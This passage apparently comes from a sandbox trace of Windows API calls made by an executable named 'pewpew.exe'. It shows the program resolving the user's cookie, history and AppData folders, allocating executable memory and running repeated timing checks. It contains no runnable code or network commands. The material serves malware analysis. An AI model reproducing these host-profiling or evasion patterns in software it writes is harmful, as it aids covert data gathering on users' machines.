pbstr=0x6ef6c4*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 1 [0065.890] SysReAllocStringLen (in: pbstr=0x6ef6c8*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", len=0x27 | out: pbstr=0x6ef6c8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 1 [0065.890] GetThreadLocale () returned 0x409 [0065.890] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.890] GetThreadLocale () returned 0x409 [0065.890] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.890] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpFilePart=0x6ef400*=0x0) returned 0x27 [0065.890] SysReAllocStringLen (in: pbstr=0x6ef6c8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", len=0x27 | out: pbstr=0x6ef6c8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 1 [0065.890] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", len=0x27 | out: pbstr=0x6ef630*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 1 [0065.891] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", cchLength=0x27 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\") returned 0x27 [0065.891] SysReAllocStringLen (in: pbstr=0x6ef6c8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\", len=0x27 | out: pbstr=0x6ef6c8*="c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\") returned 1 [0065.891] SysReAllocStringLen (in: pbstr=0x22827c8*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\", len=0x27 | out: pbstr=0x22827c8*="c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\") returned 1 [0065.891] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, pszPath=0x2291da8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0065.893] SysReAllocStringLen (in: pbstr=0x6ef6b8*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History", len=0x45 | out: pbstr=0x6ef6b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0065.893] SysReAllocStringLen (in: pbstr=0x6ef6bc*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x46 | out: pbstr=0x6ef6bc*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0065.893] GetThreadLocale () returned 0x409 [0065.893] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.893] GetThreadLocale () returned 0x409 [0065.893] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.893] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", lpFilePart=0x6ef400*=0x0) returned 0x46 [0065.893] SysReAllocStringLen (in: pbstr=0x6ef6bc*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x46 | out: pbstr=0x6ef6bc*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0065.893] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x46 | out: pbstr=0x6ef630*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0065.893] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", cchLength=0x46 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\") returned 0x46 [0065.893] SysReAllocStringLen (in: pbstr=0x6ef6bc*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\", len=0x46 | out: pbstr=0x6ef6bc*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0065.893] SysReAllocStringLen (in: pbstr=0x22827cc*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\", len=0x46 | out: pbstr=0x22827cc*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0065.893] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0x2291da8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 0x0 [0065.895] SysReAllocStringLen (in: pbstr=0x6ef6ac*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x47 | out: pbstr=0x6ef6ac*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0065.895] SysReAllocStringLen (in: pbstr=0x6ef6b0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x48 | out: pbstr=0x6ef6b0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0065.895] GetThreadLocale () returned 0x409 [0065.895] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.895] GetThreadLocale () returned 0x409 [0065.895] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.895] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpFilePart=0x6ef400*=0x0) returned 0x48 [0065.896] SysReAllocStringLen (in: pbstr=0x6ef6b0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x48 | out: pbstr=0x6ef6b0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0065.896] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x48 | out: pbstr=0x6ef630*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0065.896] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchLength=0x48 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 0x48 [0065.896] SysReAllocStringLen (in: pbstr=0x6ef6b0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\", len=0x48 | out: pbstr=0x6ef6b0*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 1 [0065.896] SysReAllocStringLen (in: pbstr=0x22827d0*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\", len=0x48 | out: pbstr=0x22827d0*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 1 [0065.896] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0x2291da8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 0x0 [0065.898] SysReAllocStringLen (in: pbstr=0x6ef6a0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x56 | out: pbstr=0x6ef6a0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0065.898] SysReAllocStringLen (in: pbstr=0x6ef6a4*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x57 | out: pbstr=0x6ef6a4*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0065.898] GetThreadLocale () returned 0x409 [0065.898] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.898] GetThreadLocale () returned 0x409 [0065.898] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.898] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", lpFilePart=0x6ef400*=0x0) returned 0x57 [0065.898] SysReAllocStringLen (in: pbstr=0x6ef6a4*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x57 | out: pbstr=0x6ef6a4*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0065.898] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x57 | out: pbstr=0x6ef630*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0065.898] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchLength=0x57 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 0x57 [0065.898] SysReAllocStringLen (in: pbstr=0x6ef6a4*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\", len=0x57 | out: pbstr=0x6ef6a4*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 1 [0065.898] SysReAllocStringLen (in: pbstr=0x22827d4*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\", len=0x57 | out: pbstr=0x22827d4*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 1 [0065.898] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x2291da8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0065.900] SysReAllocStringLen (in: pbstr=0x6ef694*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x6ef694*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0065.900] SysReAllocStringLen (in: pbstr=0x6ef698*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", len=0x2e | out: pbstr=0x6ef698*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 1 [0065.900] GetThreadLocale () returned 0x409 [0065.900] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.900] GetThreadLocale () returned 0x409 [0065.900] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.900] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpFilePart=0x6ef400*=0x0) returned 0x2e [0065.900] SysReAllocStringLen (in: pbstr=0x6ef698*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", len=0x2e | out: pbstr=0x6ef698*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 1 [0065.901] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", len=0x2e | out: pbstr=0x6ef630*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 1 [0065.901] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", cchLength=0x2e | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\") returned 0x2e [0065.901] SysReAllocStringLen (in: pbstr=0x6ef698*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\", len=0x2e | out: pbstr=0x6ef698*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\") returned 1 [0065.901] SysReAllocStringLen (in: pbstr=0x22827d8*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\", len=0x2e | out: pbstr=0x22827d8*="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\") returned 1 [0065.901] VirtualFree (lpAddress=0x2294000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0065.911] GetVersion () returned 0x1db10106 [0065.911] GetCurrentProcessId () returned 0xbe0 [0065.912] GetCurrentProcess () returned 0xffffffff [0065.912] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe\" " [0065.912] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe\" " [0065.912] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe\" " [0065.912] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe\" " [0065.912] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0065.941] RtlDosPathNameToNtPathName_U (in: DosPathName="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe", NtPathName=0x6ef648, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0065.941] NtCreateFile (in: FileHandle=0x6ef658, DesiredAccess=0x80100080, ObjectAttributes=0x6ef62c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x6ef650, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x6ef658*=0xe4, IoStatusBlock=0x6ef650*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0066.048] RtlFreeAnsiString (AnsiString="\\") [0066.096] NtSetInformationFile (FileHandle=0xe4, IoStatusBlock=0x6ef654, FileInformation=0x6ef64c, Length=0x8, FileInformationClass=0xe) returned 0x0 [0066.248] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x6ef650, Buffer=0x6ef860, BufferLength=0x40, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x6ef650, Buffer=0x6ef860*) returned 0x0 [0066.366] NtSetInformationFile (FileHandle=0xe4, IoStatusBlock=0x6ef654, FileInformation=0x6ef64c, Length=0x8, FileInformationClass=0xe) returned 0x0 [0066.366] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x6ef650, Buffer=0x6ef84c, BufferLength=0x14, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x6ef650, Buffer=0x6ef84c*) returned 0x0 [0066.366] NtSetInformationFile (FileHandle=0xe4, IoStatusBlock=0x6ef654, FileInformation=0x6ef64c, Length=0x8, FileInformationClass=0xe) returned 0x0 [0066.366] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x6ef650, Buffer=0x6ef76c, BufferLength=0xe0, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x6ef650, Buffer=0x6ef76c*) returned 0x0 [0066.366] NtSetInformationFile (FileHandle=0xe4, IoStatusBlock=0x6ef654, FileInformation=0x6ef64c, Length=0x8, FileInformationClass=0xe) returned 0x0 [0066.366] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x6ef650, Buffer=0x6ef744, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x6ef650, Buffer=0x6ef744*) returned 0x0 [0066.366] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x6ef650, Buffer=0x6ef744, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x6ef650, Buffer=0x6ef744*) returned 0x0 [0066.366] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x6ef650, Buffer=0x6ef744, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x6ef650, Buffer=0x6ef744*) returned 0x0 [0066.367] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x6ef650, Buffer=0x6ef744, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x6ef650, Buffer=0x6ef744*) returned 0x0 [0066.367] NtReadFile (in: FileHandle=0xe4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x6ef650, Buffer=0x6ef744, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x6ef650, Buffer=0x6ef744*) returned 0x0 [0066.367] NtClose (Handle=0xe4) returned 0x0 [0066.367] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0066.367] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0066.367] GetVersionExA (in: lpVersionInformation=0x6ef5cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6ef5f4, dwMinorVersion=0x76e4443a, dwBuildNumber=0x767666bc, dwPlatformId=0xb10f00, szCSDVersion="°Z°") | out: lpVersionInformation=0x6ef5cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0066.539] GetCurrentThreadId () returned 0xb0c [0066.539] VirtualAlloc (lpAddress=0x2294000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x40) returned 0x2294000 [0066.664] GetTickCount () returned 0x114ad8e [0066.664] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694042562) returned 1 [0066.664] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694050565) returned 1 [0066.664] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694057601) returned 1 [0066.664] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694064751) returned 1 [0066.664] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694071933) returned 1 [0066.664] Sleep (dwMilliseconds=0x0) [0066.665] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694171386) returned 1 [0066.665] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694179004) returned 1 [0066.666] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694185759) returned 1 [0066.666] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694192973) returned 1 [0066.666] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694199675) returned 1 [0066.666] Sleep (dwMilliseconds=0x0) [0066.670] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694602253) returned 1 [0066.670] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694610317) returned 1 [0066.670] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694617443) returned 1 [0066.670] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694624485) returned 1 [0066.670] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18694631574) returned 1 [0066.670] Sleep (dwMilliseconds=0x0) [0066.687] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18696353089) returned 1 [0066.687] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18696361268) returned 1 [0066.687] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18696368256) returned 1 [0066.687] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18696375104) returned 1 [0066.687] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef818 | out: lpPerformanceCount=0x6ef818*=18696382071) returned 1 [0066.688] Sleep (dwMilliseconds=0x0) [0066.688] GetTickCount () returned 0x114ad9e [0066.688] VirtualFree (lpAddress=0x22b4000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0066.852] VirtualAlloc (lpAddress=0x22b4000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x22b4000 [0067.048] RtlUnwind (TargetFrame=0x6ef84c, TargetIp=0xd3944, ExceptionRecord=0x6ef398, ReturnValue=0x0) [0067.050] RtlUnwind (TargetFrame=0x6ef84c, TargetIp=0xd3944, ExceptionRecord=0x6ef398, ReturnValue=0x0) [0067.058] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6eee74, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0067.058] RtlUnwind (TargetFrame=0x6ef84c, TargetIp=0xd3944, ExceptionRecord=0x6ef398, ReturnValue=0x0) [0067.120] VirtualAlloc (lpAddress=0x22c4000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x22c4000 [0067.226] VirtualFree (lpAddress=0x22c4000, dwSize=0x10000, dwFreeType=0x4000) returned 1 [0067.283] GetCurrentThreadId () returned 0xb0c [0067.283] GetCurrentThreadId () returned 0xb0c [0067.283] GetCurrentThreadId () returned 0xb0c [0067.283] GetCurrentThreadId () returned 0xb0c [0067.283] GetCurrentThreadId () returned 0xb0c [0067.283] GetCurrentThreadId () returned 0xb0c [0067.283] GetCurrentThreadId () returned 0xb0c [0067.283] GetCurrentThreadId () returned 0xb0c [0067.283] GetCurrentThreadId () returned 0xb0c [0067.283] GetCurrentThreadId () returned 0xb0c [0067.284] GetCurrentThreadId () returned 0xb0c [0067.284] GetCurrentThreadId () returned 0xb0c [0067.284] GetCurrentThreadId () returned 0xb0c [0067.284] GetCurrentThreadId () returned 0xb0c [0067.284] GetCurrentThreadId () returned 0xb0c [0067.284] VirtualFree (lpAddress=0x22b4000, dwSize=0xc000, dwFreeType=0x4000) returned 1 [0067.444] GetLocalTime (in: lpSystemTime=0x6ef814 | out: lpSystemTime=0x6ef814*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x1, wMilliseconds=0x19e)) [0067.444] GetTimeZoneInformation (in: lpTimeZoneInformation=0x6ef764 | out: lpTimeZoneInformation=0x6ef764) returned 0x1 [0067.550] GetLocalTime (in: lpSystemTime=0x6ef814 | out: lpSystemTime=0x6ef814*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xa, wSecond=0x1, wMilliseconds=0x1dd)) [0067.550] GetTimeZoneInformation (in: lpTimeZoneInformation=0x6ef764 | out: lpTimeZoneInformation=0x6ef764) returned 0x1 [0067.550] GetTickCount () returned 0x114affe [0067.550] GetTickCount () returned 0x114affe [0067.554] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0067.554] RtlUnwind (TargetFrame=0x6ef804, TargetIp=0xd3944, ExceptionRecord=0x6ef350, ReturnValue=0x0) [0067.554] LoadStringA (in: hInstance=0xd0000, uID=0xffdf, lpBuffer=0x6eee2c, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0067.555] RtlUnwind 